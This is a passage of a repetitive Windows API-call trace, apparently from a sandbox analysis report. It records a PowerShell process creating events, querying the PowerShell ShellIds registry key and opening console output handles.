bInitialState=0, lpName=0x0) returned 0x2f0 [0238.406] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390 [0238.407] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0238.407] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0238.428] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370 [0238.428] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c [0238.428] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0238.429] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0238.429] SetEvent (hEvent=0x170) returned 1 [0238.429] SetEvent (hEvent=0x384) returned 1 [0238.429] SetEvent (hEvent=0x35c) returned 1 [0238.429] SetEvent (hEvent=0x16c) returned 1 [0238.429] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0238.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x3a8) returned 0x0 [0238.429] RegQueryValueExW (in: hKey=0x3a8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0239.152] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0239.157] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0239.157] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0239.163] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0239.163] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0239.167] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0239.168] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0239.168] CloseHandle (hObject=0xf) returned 1 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3cc [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d0 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d8 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3dc [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0239.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0239.170] SetEvent (hEvent=0x3d0) returned 1 [0239.170] SetEvent (hEvent=0x3cc) returned 1 [0239.170] SetEvent (hEvent=0x3c8) returned 1 [0239.170] SetEvent (hEvent=0x3d4) returned 1 [0239.170] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0239.170] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x3fc) returned 0x0 [0239.170] RegQueryValueExW (in: hKey=0x3fc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0240.046] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0240.051] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0240.052] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.057] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0240.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.062] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0240.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.063] CloseHandle (hObject=0xf) returned 1 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x418 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x424 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x42c [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x430 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x434 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x43c [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x440 [0240.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x444 [0240.064] SetEvent (hEvent=0x420) returned 1 [0240.064] SetEvent (hEvent=0x41c) returned 1 [0240.065] SetEvent (hEvent=0x418) returned 1 [0240.065] SetEvent (hEvent=0x424) returned 1 [0240.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x448 [0240.065] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x44c) returned 0x0 [0240.065] RegQueryValueExW (in: hKey=0x44c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0240.192] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0240.197] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0240.198] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.203] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0240.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.208] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0240.209] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0240.209] CloseHandle (hObject=0xf) returned 1 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x464 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x470 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x46c [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x474 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x478 [0240.210] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x47c [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x480 [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484 [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x488 [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x48c [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x490 [0240.211] SetEvent (hEvent=0x46c) returned 1 [0240.211] SetEvent (hEvent=0x468) returned 1 [0240.211] SetEvent (hEvent=0x464) returned 1 [0240.211] SetEvent (hEvent=0x470) returned 1 [0240.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x494 [0240.211] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x498) returned 0x0 [0240.212] RegQueryValueExW (in: hKey=0x498, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0242.726] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0242.732] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0242.732] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0242.737] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0242.738] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0242.743] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0242.744] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0242.745] CloseHandle (hObject=0xf) returned 1 [0242.745] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0242.745] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4b0 [0242.745] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4bc [0242.745] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4b8 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c0 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4c4 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4c8 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4cc [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d0 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4d4 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d8 [0242.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4dc [0242.746] SetEvent (hEvent=0x4b8) returned 1 [0242.746] SetEvent (hEvent=0x4b4) returned 1 [0242.747] SetEvent (hEvent=0x4b0) returned 1 [0242.747] SetEvent (hEvent=0x4bc) returned 1 [0242.747] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4e0 [0242.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x4e4) returned 0x0 [0242.747] RegQueryValueExW (in: hKey=0x4e4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0243.730] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0243.735] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0243.736] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0243.741] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0243.741] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0243.746] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0243.747] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0243.747] CloseHandle (hObject=0xf) returned 1 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x500 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4fc [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x508 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x504 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x50c [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x510 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x514 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x518 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x51c [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x520 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0243.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x528 [0243.749] SetEvent (hEvent=0x504) returned 1 [0243.749] SetEvent (hEvent=0x500) returned 1 [0243.749] SetEvent (hEvent=0x4fc) returned 1 [0243.749] SetEvent (hEvent=0x508) returned 1 [0243.749] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x52c [0243.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x530) returned 0x0 [0243.749] RegQueryValueExW (in: hKey=0x530, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0244.815] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0244.820] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0244.821] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0244.826] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0244.826] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0244.831] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0244.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0244.832] CloseHandle (hObject=0xf) returned 1 [0244.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0244.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x548 [0244.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x554 [0244.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x550 [0244.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x558 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x55c [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x560 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x564 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x568 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x56c [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x570 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x574 [0244.833] SetEvent (hEvent=0x550) returned 1 [0244.833] SetEvent (hEvent=0x54c) returned 1 [0244.833] SetEvent (hEvent=0x548) returned 1 [0244.833] SetEvent (hEvent=0x554) returned 1 [0244.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x578 [0244.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x57c) returned 0x0 [0244.834] RegQueryValueExW (in: hKey=0x57c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0245.726] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0245.732] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0245.768] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0245.772] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0245.773] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0245.777] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0245.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0245.778] CloseHandle (hObject=0xf) returned 1 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x598 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x594 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5a0 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x59c [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5a4 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5a8 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5ac [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5b0 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5b4 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5b8 [0245.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5bc [0245.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c0 [0245.780] SetEvent (hEvent=0x59c) returned 1 [0245.780] SetEvent (hEvent=0x598) returned 1 [0245.780] SetEvent (hEvent=0x594) returned 1 [0245.780] SetEvent (hEvent=0x5a0) returned 1 [0245.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c4 [0245.780] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x5c8) returned 0x0 [0245.780] RegQueryValueExW (in: hKey=0x5c8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0247.252] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0247.257] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0247.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0247.263] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 